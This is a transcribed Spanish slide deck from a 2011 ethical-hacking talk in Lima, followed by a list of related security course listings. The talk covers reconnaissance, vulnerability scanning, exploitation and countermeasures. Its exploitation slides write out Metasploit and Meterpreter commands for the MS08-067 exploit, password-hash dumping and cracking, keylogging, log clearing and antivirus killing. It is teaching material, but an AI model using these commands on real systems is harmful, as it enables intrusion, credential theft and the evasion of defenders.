Lima, 24 Setiembre, 2011

Tamaño: px
Comenzar la demostración a partir de la página:

Download "Lima, 24 Setiembre, 2011 OMARC320@GMAIL.COM"

Transcripción

1 Lima, 24 Setiembre, 2011

2 AGENDA 1 Acerca del autor 2 Introducción al Ethical Hacking 3 Ethical Hacking vs Pentesting 4 Escaneo de red organizacional 5 Análisis de Vulnerabilidades 6 Explotación de Vulnerabilidades 7 Pentesting 8 Prevención y contramedidas Omar Palomino 2

3 1 Acerca del autor 10 años de experiencia en seguridad de información Psicólogo que aun no comienza sus estudios. Maestrista de Ing. de Computación y Sistemas Consultor en Seguridad de información, CEH Escritor en mis tiempos libres: Omar Palomino 3

4 2 Introducción al Ethical Hacking Ethical Hacking = Hacker bueno Prevención de ataques mal intencionados. Análisis de vulnerabilidades preventivos Cumplimientos de normas: NTP, ISO Uso de metodologías: OSSMT, OWASP, etc Cumplimiento de la legislación peruana Omar Palomino 4

5 3 Ethical Hacking vs Pentesting Omar Palomino 5

6 3 Ethical Hacking vs Pentesting Omar Palomino 6

7 4 Escaneo de red organizacional Uso de herramientas: Nmap: La herramienta por excelencia. Tracert: Examina las rutas de llegada Consulta a los DNS (http://network-tools.com) Consúltale a Google Tools: * Maltego (veamos un ejemplo) Omar Palomino 7

8 4 Escaneo de red organizacional NMAP: Root# nmap sv O T3 PN F <target> Omar Palomino 8

9 4 Escaneo de red organizacional NMAP Avanzado: TCP Syn Scan SYN SYN / ACK ACK Nmap reconoce que hay una conexión abierta: Bingo Omar Palomino 9

10 4 Escaneo de red organizacional NMAP Avanzado: TCP Syn Scan SYN SYN / ACK ACK Nmap NO reconoce que hay una conexión abierta Omar Palomino 10

11 4 Escaneo de red organizacional NMAP Avanzado: TCP Syn Scan Root# nmap ss v <target> SYN SYN / ACK RST Nmap reconoce que hay una conexión abierta: BINGO! Omar Palomino 11

12 4 Escaneo de red organizacional NMAP Avanzado: Técnicas evasivas de IPS/IDS - F: Fragmentar paquetes - sf: FIN Scan (Stealth Scan) Omar Palomino 12

13 4 Escaneo de red organizacional: Ing. Social Llamadas telefónicas Piggybacking Escritorios limpios Dumpster diving Phishing Redes Sociales MALTEGO Omar Palomino 13

14 4 Escaneo de red organizacional: Ing. Social Omar Palomino 14

15 5 Análisis de Vulnerabilidades Nessus Qualys Acunetix Vulnerabilidades en S.O y Aplicaciones Shadow Security Scanner Bactrack Omar Palomino 15

16 5 Análisis de Vulnerabilidades Nessus Omar Palomino 16

17 6 Explotación de Vulnerabilidades Metasploit msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set payload windows/vncinject/bind_tcp payload => windows/vncinject/bind_tcp msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST RHOST => msf exploit(ms08_067_netapi) > exploit Omar Palomino 17

18 6 Explotación de Vulnerabilidades Metasploit Omar Palomino 18

19 6 Explotación de Vulnerabilidades Armitage Omar Palomino 19

20 6 Explotación de Vulnerabilidades Armitage Meterpreter: Familia de plugins avanzados de los mismos creadores de Metasploit Framework, que se utiliza sobre sistemas comprometidos y tienen como característica fundamental que todo es cargado en memoria sin crear ningún proceso adicional ni dejar rastros PS IDLETIME SYSINFO Omar Palomino 20

21 6 Explotación de Vulnerabilidades Armitage PS IDLETIME SYSINFO HASHDUMP Omar Palomino 21

22 6 Explotación de Vulnerabilidades Rainbow Tables Almacenamiento contraseñas Windows: LN Hash/NTLM Hash por defecto SUPERPASSWORD SUPERPA SSWORD e52cac67419a9a224a3b108f3fa6cb6d e52cac67419a9a22 4a3b108f3fa6cb6d Omar Palomino 22

23 6 Explotación de Vulnerabilidades Rainbow Tables Omar Palomino 23

24 6 Explotación de Vulnerabilidades Rainbow Tables Almacenamiento contraseñas del Active Directory Meterpreter> mkdir C:\cache Meterpreter> upload /root/cache C:\cache Meterpreter> cd C:\cache Meterpreter> ls C:\cachedump.exe > salida.txt Meterpreter> download salida.txt --wordlist:password.lst -format:mscash salida.txt Loaded 2 password hashes with 2 different salts (M$ Cache Hash [Generic 1x]) password (mpalomino) superpassword (opalomino) Omar Palomino 24

25 6 Explotación de Vulnerabilidades Armitage Con Metasploit (y con Armitage) podemos realizar sniffing de dos tipos: SNIFFING Interfaces de red TECLADO Meterpreter> ps Meterpreter> migrate 1736 Meterpreter> getpid Meterpreter> keyscan_start Meterpreter> keyscan_dump Meterpreter> keyscan_stop Omar Palomino 25

26 6 Explotación de Vulnerabilidades Armitage Screenshot Webcam Clearev Run get_application_list Winenum Download Run enum_shares Excute f cmd.exe i -t Run killav Run service_maneger -l Omar Palomino 26

27 6 Explotación de Vulnerabilidades Vistumbler Android: Wifiscan, Wigle Wifi Antena: Chipset Realtek o Atheros Vulnerabilidades en REDES INALAMBRICAS: Encontrar vulnerables: Cifrado WEP Filtrado MAC Wardriving redes Airmon Omar Palomino 27

28 6 Explotación de Vulnerabilidades Más de 30 redes vulnerables! Omar Palomino 28

29 6 Explotación de Vulnerabilidades Más de 20 redes vulnerables! Omar Palomino 29

30 6 Explotación de Vulnerabilidades AndroidScreenCast:./adb kill-server./adb star-server Requerimientos para auditoría wireless: Chipset Realtek, Atheros Antena con potencia Diversas herramientas: airmon Omar Palomino 30

31 6 Explotación de Vulnerabilidades Vulnerabilidades en la RED: Encontrar información importante viajando en la red. Contraseñas Conversaciones Acceso a segmentos de red no autorizado. Ettercap Wireshark Cain y Abel SSLTrip Metasploit Airmon Omar Palomino 31

32 8 Prevención y contramedidas El único sistema seguro es aquél que está apagado en el interior de un bloque de hormigón protegido en una habitación sellada y rodeada por guardias armados. Eric Raymond La Seguridad no es solo un proceso Tecnológico Es un proceso Organizacional Omar Palomino 32

33 8 Prevención y contramedidas FACTOR TÉCNICO * Firewall capa 3 * Firewall de aplicaciones * Firewall de Bases de datos * IPS/IDS * Correlación de eventos. FACTOR HUMANO * Campañas de concientización * Pruebas de ingeniería social * Charlas y reuniones. SISTEMA DE GESTIÓN * Sistema de Gestión de seguridad de información (SGSI) * ISO /17799 * Gestión de Riesgos (ISO 27005) * ITIL, COBIT Omar Palomino 33

34 Lima, 24 Setiembre, 2011

AGENDA. Introducción al Ethical Hacking. Ethical Hacking vs Pentesting. Escaneo de red organizacional. Análisis de Vulnerabilidades

AGENDA. Introducción al Ethical Hacking. Ethical Hacking vs Pentesting. Escaneo de red organizacional. Análisis de Vulnerabilidades OMARC320@GMAIL.COM AGENDA 1 Acerca del autor 2 Introducción al Ethical Hacking 3 Ethical Hacking vs Pentesting 4 Escaneo de red organizacional 5 Análisis de Vulnerabilidades 6 Explotación de Vulnerabilidades

Más detalles

Dejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com

Dejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+. Administrador

Más detalles

Metasploit Framework

Metasploit Framework Metasploit Framework ÍNDICE 1. Introducción al exploiting 2. Metasploit Framework What is? Arquitectura Módulos Adición módulos Entorno de usuario y automatización 3. Metasploit as a User Interfaces Comandos

Más detalles

Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis.

Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis. Actividad 4. Instalar MBSA y GFI Languard en Windows Server 2008 y hacer un análisis. MBSA: instalamos Microsoft Baseline Security Analyzer (es gratis), y pulsamos en la opción Scan a computer. GFI Languard:

Más detalles

Dejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com

Dejando la puerta abierta: Making Metasploit Backdoors Omar Palomino 13 de Marzo, 2012 omarc320@gmail.com http://www.el-palomo.com Linux Week 2012 Dejando la puerta abierta: Making Metasploit Backdoors 13 de Marzo, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+. Administrador

Más detalles

Qué es un pentest? Es un método para evaluar la seguridad de un ordenador o una red de ordenadores simulando un ataque externo o interno no autorizado

Qué es un pentest? Es un método para evaluar la seguridad de un ordenador o una red de ordenadores simulando un ataque externo o interno no autorizado Qué es un pentest? Es un método para evaluar la seguridad de un ordenador o una red de ordenadores simulando un ataque externo o interno no autorizado Qué implica? Un análisis activo del sistema en busca

Más detalles

- Analizar y categorizar las debilidades explotables basadas en el impacto potencial y posibilidad de ocurrencia.

- Analizar y categorizar las debilidades explotables basadas en el impacto potencial y posibilidad de ocurrencia. Test de Intrusión: Test de Intrusión, también llamado a veces hacking ético es una evaluación activa de las medidas de seguridad de la información. En los entornos de red complejos actuales, la exposición

Más detalles

Diplomado. Duriva www.duriva.com [Escriba texto] Página 0

Diplomado. Duriva www.duriva.com [Escriba texto] Página 0 2015 Diplomado Duriva www.duriva.com [Escriba texto] Página 0 La realidad dicta que en la actualidad las organizaciones deben contemplar la evaluación de la seguridad de sus sistemas. De esta forma es

Más detalles

Tema 6. Seguridad Perimetral Parte 3. Análisis de seguridad en redes Tests de intrusión

Tema 6. Seguridad Perimetral Parte 3. Análisis de seguridad en redes Tests de intrusión Tema 6 SSI T. intrusión Tipos Metodologías Fases Tema 6. Seguridad Perimetral Parte 3. Análisis de seguridad en redes Tests de intrusión Seguridad en Sistemas Informáticos Noviembre-2012 Tema 6 SSI Contenido

Más detalles

SECURITY DAY PERU. Ataques a la familia de Sistemas Operativos Windows. Explotando Vulnerabilidades a Servicios / Ataques a Clientes.

SECURITY DAY PERU. Ataques a la familia de Sistemas Operativos Windows. Explotando Vulnerabilidades a Servicios / Ataques a Clientes. SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a la familia de Sistemas

Más detalles

Hacking ético y Seguridad en Red

Hacking ético y Seguridad en Red TFC: Administración de Redes y Sistemas Operativos Hacking ético y Seguridad en Red Alumno: Cristiano Dias Consultor: José Manuel Castillo Pedrosa 1 Índice Introducción... 3 Perfil del Hacker ético...

Más detalles

Anexo 2. Realización de los escenarios de ataque

Anexo 2. Realización de los escenarios de ataque Anexo 2 Realización de los escenarios de ataque 1. Requisitos para el ataque Para la elaboración de los ataques se trabajó con los siguientes elementos: Archivos ejecutables de Slacker y Timestomp, conextensión.exe.

Más detalles

Metasploit framework, al igual que nessus, su versión paga es mucho más informática que la gratuita.

Metasploit framework, al igual que nessus, su versión paga es mucho más informática que la gratuita. Ethical Hacking en modo Gráfico Herramientas para hacking ético hay muchas, las profesionales o pagas ofrecen informes mucho más detallados que las no pagas, pero ambas nos dan un indicio de que es lo

Más detalles

Hacking Ético. Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo

Hacking Ético. Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo Hacking Ético Módulo II Fase 2: Técnicas activas de obtención de información: Escaneo Objetivos Detectar sistemas vivos en la red. Descubrir servicios que se están ejecutando o que están escuchando en

Más detalles

SISTEMAS Y HACKING ÉTICO

SISTEMAS Y HACKING ÉTICO 2015 Programa de Extensión para Profesionales PLANA DOCENTE El programa cuenta con la participación de reconocidos profesionales con amplia experiencia académica y laboral, entre los que podemos destacar:

Más detalles

Anonimato en la web. Anonimato en la web: Proyecto TOR + SQLMap. Omar Palomino. omarc320@gmail.com. http://www.el-palomo.com.

Anonimato en la web. Anonimato en la web: Proyecto TOR + SQLMap. Omar Palomino. omarc320@gmail.com. http://www.el-palomo.com. Anonimato en la web Anonimato en la web: Proyecto TOR + SQLMap Abril, 2012 Omar Palomino omarc320@gmail.com Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas, CEH, Security+, ITIL v3. Consultor

Más detalles

CERTIFICACIÓN THD-EPC

CERTIFICACIÓN THD-EPC Propuesta: CERTIFICACIÓN THD-EPC Ethical Pentester Certified Febrero 8 de 2015 Las partes se comprometen a mantener la confidencialidad absoluta con respecto a la información contenida en el presente documento.

Más detalles

Seguridad en redes Tareas de Reconocimiento

Seguridad en redes Tareas de Reconocimiento Seguridad en redes Tareas de Reconocimiento Félix Molina Ángel molina@uagro.mx Tareas de reconocimiento Objetivo: Utilizar técnicas y herramientas básicas para obtener información esencial acerca de sitios

Más detalles

TALLER AUDITORIA Y PENTEST 2012

TALLER AUDITORIA Y PENTEST 2012 Taller auditoria y pentest 2012 por Bernabé Muñoz Mogrobejo se encuentra bajo una Licencia Creative Commons Reconocimiento-NoComercial-CompartirIgual 3.0 Unported. Pág 1 PRÓLOGO Ya ha pasado casi más de

Más detalles

Presentación. Porqué formarte con nosotros?

Presentación. Porqué formarte con nosotros? Presentación Un Hacker Ético es un profesional dotado de habilidades para encontrar las debilidades o vulnerabilidades en los sistemas utilizando el mismo conocimiento y herramientas que un hacker malicioso,

Más detalles

El Hacking Ético y los Grupos Hackitivistas Anonymous y Lulzsec

El Hacking Ético y los Grupos Hackitivistas Anonymous y Lulzsec Metodología. www.dsteamseguridad.com La Metodología de la charla esta guiada por el concepto de cada una de las fases de ataque, con su respectiva demostración Arquitectura de Red (Laboratorio Virtual)

Más detalles

http://www.villacorp.com Pentesting con Android Ing. Javier Villanueva

http://www.villacorp.com Pentesting con Android Ing. Javier Villanueva http://www.villacorp.com Pentesting con Android Ing. Javier Villanueva Quién Soy? Ing. Javier Villanueva Consultor, Investigador e Instructor Independiente en Seguridad Ofensiva ( Hacking Ético ) Director

Más detalles

Inicio. junio 2016. Plana Docente. Dirigido a. Jean del Carpio Foronda - Perú. Alexis Torres Pardo - Perú

Inicio. junio 2016. Plana Docente. Dirigido a. Jean del Carpio Foronda - Perú. Alexis Torres Pardo - Perú Inicio junio 2016 Las empresas requieren verificar si sus redes están seguras de cualquier ataque. Para ello, es necesario someter la red a una serie de pruebas para verificar su total seguridad. Usando

Más detalles

TEMARIO. Introducción o Las evaluaciones de seguridad o El hacker ético o Metodología de ataque o Entregables o Bibliografía

TEMARIO. Introducción o Las evaluaciones de seguridad o El hacker ético o Metodología de ataque o Entregables o Bibliografía TEMARIO Introducción o Las evaluaciones de seguridad o El hacker ético o Metodología de ataque o Entregables o Bibliografía Fundamentos de seguridad de la información o Conceptos y definiciones o Fuga

Más detalles

Protección y Seguridad de la Información (junio 2009)

Protección y Seguridad de la Información (junio 2009) Protección y Seguridad de la Información (junio 2009) Nombre.: 1.- DVL a) Distribución GNU/Linux que aglutina las principales herramientas en ataque orientada a la realización de auditorías de seguridad

Más detalles

CURSO DE ETHICAL HACKING

CURSO DE ETHICAL HACKING 1. OBJETIVOS DEL CURSO 1.1. OBJETIVO GENERAL CURSO DE ETHICAL HACKING Brindar a los participantes los conocimientos, técnicas y habilidades utilizadas por hackers para realizar ataques informáticos. 1.2.

Más detalles

ArCERT Jornadas de Seguridad Informática 2009

ArCERT Jornadas de Seguridad Informática 2009 ArCERT Jornadas de Seguridad Informática 2009 La Web desde el ojo de un atacante Nahuel Grisolía ngrisolia@cybsec.com 02 de Octubre de 2009 Buenos Aires - Argentina Agenda Agenda Introducción - Intereses

Más detalles

Universidad Nacional de La Matanza Escuela Internacional de Informática

Universidad Nacional de La Matanza Escuela Internacional de Informática Universidad Nacional de La Matanza Escuela Internacional de Informática Curso 02 Días: de lunes 20 a viernes 24 de Octubre Horario: de 8:30 a 12:30 hs. Horas totales del curso: 20 con evaluación Cantidad

Más detalles

Certified Ethical Hacker (CEH) v8

Certified Ethical Hacker (CEH) v8 Certified Ethical Hacker (CEH) v8 Curso que ofrece a los asistentes los contenidos y habilidades necesarios para analizar la seguridad de los sistemas de seguridad. El curso cubrirá los conceptos de escaneo,

Más detalles

Escaneo de servidor FTP Búsqueda de vulnerabilidades

Escaneo de servidor FTP Búsqueda de vulnerabilidades Escaneo de servidor FTP Búsqueda de vulnerabilidades David Núñez Álvarez PSI 2011/2012 Con motivo de no revelar los datos del servidor al que se le realizó el estudio vamos a suponer que su dominio es

Más detalles

MAN IN THE MIDDLE FINAL

MAN IN THE MIDDLE FINAL 2012 MAN IN THE MIDDLE FINAL Javier García Cambronel SEGUNDO DE ASIR 28/02/2012 QUÉ ES EL PROTOCOLO ARP? MAQUINAS A UTILIZAR PRÁCTICAS PRÁCTICA1 SACANDO CONTRASEÑA MOODLE Y FACEBOOK PRÁCTICA 2 EXPLOIT

Más detalles

Criptografía y Seguridad en Redes de Comunicaciones Profesor: Álvaro Alesanco Iglesias (revisado 12-05-2010)

Criptografía y Seguridad en Redes de Comunicaciones Profesor: Álvaro Alesanco Iglesias (revisado 12-05-2010) Seguridad en Redes de Comunicaciones Criptografía y Seguridad en Redes de Comunicaciones Profesor: Álvaro Alesanco Iglesias (revisado 12-05-2010) 1 Objetivos Se pretende que la práctica sea una demostración

Más detalles

Internal Hacking y contramedidas en entorno Windows Pirateo interno, medidas de protección, desarrollo de herramientas

Internal Hacking y contramedidas en entorno Windows Pirateo interno, medidas de protección, desarrollo de herramientas Introducción 1. Preámbulo 15 2. Desciframiento de un ataque conseguido 17 3. Descifrado de contramedidas eficaces 18 3.1 Análisis de riesgos reales 18 3.2 Consideraciones técnicas 19 3.3 Consideraciones

Más detalles

Hacking Ético & Seguridad Ofensiva

Hacking Ético & Seguridad Ofensiva Hacking Ético & Seguridad Ofensiva INDICE DATOS DEL CURSO OBJETIVOS DEL CURSO CONTENIDO MATERIALES Y RECURSOS DEL CURSO EVALUACION DATOS DEL CURSO Duración: 6 Jornadas (30horas), (08:00 am a 13:00 pm)

Más detalles

DISCLAIMER Todo el contenido de esta charla es resultado de investigación con fines didácticos y educativos. El autor no se hace responsable por el uso del conocimiento contenido en la siguiente presentación.

Más detalles

UTILIZANDO METERPRETER CONTRA MAQUINAS WINDOWS

UTILIZANDO METERPRETER CONTRA MAQUINAS WINDOWS UTILIZANDO METERPRETER CONTRA MAQUINAS WINDOWS Meterpreter es una impresionante utilidad que permite obtener una gran cantidad de información sobre un objetivo comprometido, así como también manipular

Más detalles

Episodio de Pentesting

Episodio de Pentesting Episodio de Pentesting Hello world, I m backtrack Nicolás Moral de Aguilar Seguridad en tecnologías de la información Índice 1. Planteamiento del episodio 2. Conceptos necesarios 3. Configuración del escenario

Más detalles

IDENTIFICACIÓN DE VULNERABILIDADES Y PRUEBAS DE PENETRACIÓN EN REDES

IDENTIFICACIÓN DE VULNERABILIDADES Y PRUEBAS DE PENETRACIÓN EN REDES IDENTIFICACIÓN DE VULNERABILIDADES Y PRUEBAS DE PENETRACIÓN EN REDES Alejandro Hernández H. (nitrøus), CISSP, GPEN http://twitter.com/nitr0usmx http://chatsubo-labs.blogspot.com http://www.brainoverflow.org

Más detalles

100% Laboratorios en Vivo

100% Laboratorios en Vivo 100% Laboratorios en Vivo Sabemos que la única forma de aprender es haciendo. Por lo mismo todos los laboratorios son con desafíos de hacking en un ambiente en vivo. Con servidores y servicios dentro de

Más detalles

Hacking ético. Módulo III Hacking del sistema

Hacking ético. Módulo III Hacking del sistema Hacking ético Módulo III Hacking del sistema Tipos de Ataques a Passwords Ataque por diccionario Ataque por fuerza bruta Ataque híbrido Ingeniería Social Shoulder surfing 2 Hashes: Autenticación en Windows

Más detalles

Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas. Laboratorio de Seguridad en aplicaciones web

Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas. Laboratorio de Seguridad en aplicaciones web Universidad Autónoma de Nuevo León Facultad de Ciencias Físico Matemáticas Laboratorio de Seguridad en aplicaciones web Practica 2: Configuración de VPN y escaneo de puertos. Objetivos: En esta práctica

Más detalles

info.uruguay@isec-global.com 4342-4685 4342-2079 4342-5440 www.isec-global.com

info.uruguay@isec-global.com 4342-4685 4342-2079 4342-5440 www.isec-global.com thical Ethical La permanente exposición al riesgo de robo, extravío, alteración o delitos sobre la información confidencial de las empresas, las sitúa en una posición bastante delicada y critica, por lo

Más detalles

CURSO DE EXPERTO EN GESTIÓN DE SEGURIDAD DE LA INFORMACIÓN

CURSO DE EXPERTO EN GESTIÓN DE SEGURIDAD DE LA INFORMACIÓN CURSO DE EXPERTO EN GESTIÓN DE SEGURIDAD DE LA INFORMACIÓN Objetivos Generales: Al término de esta acción formativa los participantes alcanzarán los siguientes objetivos: Formar al alumno en los conocimientos

Más detalles

Penetration Test Metodologías & Usos

Penetration Test Metodologías & Usos Penetration Test Metodologías & Usos Lic. Luis Ramírez lramirez@cybsec.com 18 de Noviembre de 2009 Asunción, n, Paraguay Agenda Introducción Seguridad Informática en los Sistemas Objetivos, Tipos y Alcances

Más detalles

ACADEMIA CISCO - ESPOL. Ethical Hacking

ACADEMIA CISCO - ESPOL. Ethical Hacking Ethical Hacking OBJETIVOS En este curso se introduce a los estudiantes a los conceptos básicos del hacking y su aplicación a fin de encontrar vulnerabilidades en una red corporativa. Los estudiantes entenderán

Más detalles

ESPECIALISTA EN SEGURIDAD INFORMÁTICA Y TELECOMUNICACIONES

ESPECIALISTA EN SEGURIDAD INFORMÁTICA Y TELECOMUNICACIONES JOSÉ ALBERTO ÁVALOS VÉLEZ Calzada de Tlalpan #1522 Col. Miravalle Del.Benito Juárez C.P. 02580 Edo. Civil: Soltero Cel. 5536998925 recados: 62377587 Edad: 34 Años alberto.avalos@comunidad.unam.mx ESPECIALISTA

Más detalles

Certified Ethical Hacker Training

Certified Ethical Hacker Training Pág. 1 de 6 CONTENIDO DETALLADO Certified Ethical Hacker Training Descripción del Curso El Hacker Ético es la persona que lleva a cabo intentos de intrusión en redes y/o sistemas utilizando los mismos

Más detalles

Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales

Session Hijacking: Secuestro de sesiones en aplicaciones web empresariales Session Hijacking: en aplicaciones web empresariales OWASP LATAM TOUR 2012 OMAR PALOMINO HUAMANÍ KUNAK CONSULTING SAC omarc320@gmail.com opalomino@kunak.com.pe Telef: 973861650 http://www.el-palomo.com

Más detalles

ATAQUES DE MONITORIZACION Seguridad Informática

ATAQUES DE MONITORIZACION Seguridad Informática ATAQUES DE MONITORIZACION Seguridad Informática por Alberto Medina Mazuelos Profesor Rodrigo Tapia Santis Tecnologías de la Información y Comunicación Ingeniería en Informática Universidad Tecnológica

Más detalles

HACKING Y SEGURIDAD INFORMATICA EN DEBIAN GNU/LINUX

HACKING Y SEGURIDAD INFORMATICA EN DEBIAN GNU/LINUX Y SEGURIDAD DEBIAN Msc(c). Felipe Andrés Corredor Chavarro Ingeniero de Sistemas : Especialista en Soluciones Telemáticas felipe@esdebian.org - Tel: (8)6616800 ext. 124 Fax: (8)6616800 ext. 141 Universidad

Más detalles

EEHC. Enhacke Ethical Hacking Certification

EEHC. Enhacke Ethical Hacking Certification EEHC Enhacke Ethical Hacking Certification Curso de Certificación de Hacking Ético ENHACKE S.A.C. Año 2010 ENHACKE ETHICAL HACKING CERTIFICATION EEHC INTRODUCCION El curso EEHC provee el conocimiento necesario

Más detalles

Práctica 1. Ethical Haking. Pentest en la red.

Práctica 1. Ethical Haking. Pentest en la red. Administración de la seguridad informática (Planes y respuestas a contigencias) Práctica 1. Ethical Haking. Pentest en la red. dsc.itmorelia.edu.mx/~hferreir/isms/practica1/ Introducción. CEH (Certified

Más detalles

Tests de Intrusión. Análise da seguridade en entornos GNU/Linux

Tests de Intrusión. Análise da seguridade en entornos GNU/Linux Francisco José Ribadas Pena ribadas@uvigo.es Departamento de Informática Universidade de Vigo Tests de Intrusión. Análise da seguridade en entornos GNU/Linux Ferramentas de seguridade en GNU/Linux Curso

Más detalles

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS Marco A. Lozano Merino Mayo 2012 Índice 1.Seguridad a nivel de usuario 1.Amenazas y protección 2.La realidad de la seguridad: hackers 3.Seguridad en redes

Más detalles

3-ANÁLISIS DE VULNERABILIDADES

3-ANÁLISIS DE VULNERABILIDADES 3-ANÁLISIS DE VULNERABILIDADES Es la tercera fase del ciclo de auditoria del tipo Hacking Ético, y tiene como objetivo el identificar si un sistema es débil o susceptible de ser afectado o atacado de alguna

Más detalles

School of Hacking. Taller 3: Herramientas básicas del hacker: Metasploit y Armitage

School of Hacking. Taller 3: Herramientas básicas del hacker: Metasploit y Armitage School of Hacking Taller 3: Herramientas básicas del hacker: Metasploit y Armitage Antonio Díaz Díaz & José José Antonio Gómez, 2015 2015 Índice Metasploit Framework (José Antonio Gómez) Terminología Msfconsole:

Más detalles

Certified Offensive and Defensive Security Professional - Entrenamiento E-learning - 3-SCANNING. www.dsteamseguridad.com

Certified Offensive and Defensive Security Professional - Entrenamiento E-learning - 3-SCANNING. www.dsteamseguridad.com 3-SCANNING NETWORK MAPPING. El proceso de Network Mapping, consiste en tratar de identificar la arquitectura (Topología) de la red a la cual vamos a realizarle las pruebas de seguridad y auditoria a nivel

Más detalles

Administración y Seguridad de Sistemas 2016 Ethical Hacking

Administración y Seguridad de Sistemas 2016 Ethical Hacking Administración y Seguridad de Sistemas 2016 Ethical Hacking Carina Indarte Juan Ignacio Larrambebere Guillermo Leopold Agustín Romano Ethical Hacking Introducción Footprinting Doxing Áreas de testeo y

Más detalles

Auditorías de Seguridad: revisión como método de prevención. Vicente Aguilera Díaz Internet Security Auditors, S.L.

Auditorías de Seguridad: revisión como método de prevención. Vicente Aguilera Díaz Internet Security Auditors, S.L. Auditorías de Seguridad: revisión como método de prevención Vicente Aguilera Díaz Internet Security Auditors, S.L. CONTENIDO 1. Protección de la información 2. Auditorías de seguridad 3. Implantación de

Más detalles

--------------------------------++Pequeño ejemplo++-----------------------------------

--------------------------------++Pequeño ejemplo++----------------------------------- Advanced And Comprehensive Use Of Nmap ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: [+] Title: Advanced And Comprehensive Use Of Nmap [+] Author: Juh... [+] Contact: juhscr@hotmail.es

Más detalles

Hacking Ético: Cacería de Vulnerabilidades OWASP LATAM TOUR 2015

Hacking Ético: Cacería de Vulnerabilidades OWASP LATAM TOUR 2015 Hacking Ético: Cacería de Vulnerabilidades OWASP LATAM TOUR 2015 About Me Ingeniero de Sistemas (UNEXPO). Especialista en Auditoria de Sistemas Financieros y Seguridad de Datos. Certificado CEHv8 (EC-COUNCIL).

Más detalles

DESCRIPCIÓN DEL PROGRAMA TÉCNICO EN SEGURIDAD INFORMÁTICA

DESCRIPCIÓN DEL PROGRAMA TÉCNICO EN SEGURIDAD INFORMÁTICA DESCRIPCIÓN DEL PROGRAMA TÉCNICO EN SEGURIDAD INFORMÁTICA La Auditoría de las Tecnologías de la Información y las Comunicaciones adquiere cada vez mayor importancia, debido a la necesidad de garantizar

Más detalles

Catalogo cursos de Seguridad Informática

Catalogo cursos de Seguridad Informática Catalogo cursos de Seguridad Informática 1. Curso de Desarrollo Web Seguro Tema 1 El entorno Web 1.1 Introducción Introducción Arquitectura Web Problemas de seguridad más habituales: Comprensión de las

Más detalles

Empezando con Wmap. @luisco100

Empezando con Wmap. @luisco100 Empezando con Wmap @luisco100 El objetivo de este tutorial es dar a conocer lo pasos necesarios para utilizar la herramienta de escaneo de vulnerabilidades en sitios web Wmap. Primero que todo un reconocimiento

Más detalles

La herramienta nmap. Nmap. Roberto Gómez Cárdenas rogomez@itesm.mx http://homepage.cem.itesm.mx/rogomez. La herramienta nmap. Dr.

La herramienta nmap. Nmap. Roberto Gómez Cárdenas rogomez@itesm.mx http://homepage.cem.itesm.mx/rogomez. La herramienta nmap. Dr. Cárdenas Roberto Gómez Cárdenas rogomez@itesm.mx http://homepage.cem.itesm.mx/rogomez Lámina 1 Nmap Lámina 2 1 Cárdenas Matrix y nmap Lámina 3 Características Nmap NMAP Network Security Scanner Herramienta

Más detalles

Construcción de un Firewall para redes industriales con NetFPGA

Construcción de un Firewall para redes industriales con NetFPGA Construcción de un Firewall para redes industriales con NetFPGA Jhon Jairo Padilla Aguilar, PhD. Sergio Garcia Richard Ardila Universidad Pontificia Bolivariana-Bucaramanga Las redes de producción industrial

Más detalles

CURSO DE REDES INALÁMBRICAS WIFI SEGURAS

CURSO DE REDES INALÁMBRICAS WIFI SEGURAS CURSO DE REDES INALÁMBRICAS WIFI SEGURAS Brindar extensos conocimientos sobre la tecnología WIFI y sus estándares Explicar la manera adecuada y profesional de seleccionar los Puntos de Acceso y dispositivos

Más detalles

Protección de su Red

Protección de su Red Protección de su Red Ing. Teofilo Homsany Gerente General SOLUTECSA PaiBlla Mall, Local 45. Telefono: +507.209.4997 E mail: ventas@solucionesdetecnologia.com Áreas vulnerables de su red Gateway (entrada

Más detalles

Taller Hacking for Forensics

Taller Hacking for Forensics Taller Hacking for Forensics Duración 48 horas Objetivo general: - El participante podrá adquirir habilidades para aplicar diversas técnicas analíticas y científicas en materia de Hackeo y Análisis Forense

Más detalles

Lab 04. Herramientas de Seguridad. Área de Telemática. Seguridad de la información Universidad de Antioquia

Lab 04. Herramientas de Seguridad. Área de Telemática. Seguridad de la información Universidad de Antioquia Lab 04 Herramientas de Seguridad Área de Telemática Seguridad de la información Universidad de Antioquia Actividad 01: Manejo de Netcat Netcat, tmabién denominado NC, es una aplicación conocida como la

Más detalles

Christian Martorella - Vicente Díaz Edge-security Fist Conference April 2007

Christian Martorella - Vicente Díaz Edge-security Fist Conference April 2007 Christian Martorella - Vicente Díaz Edge-security Fist Conference April 2007 Indice Introducción a la seguridad de DB Motores de Bases de Datos Ataques internos Ataques externos Conclusiones Introducción

Más detalles

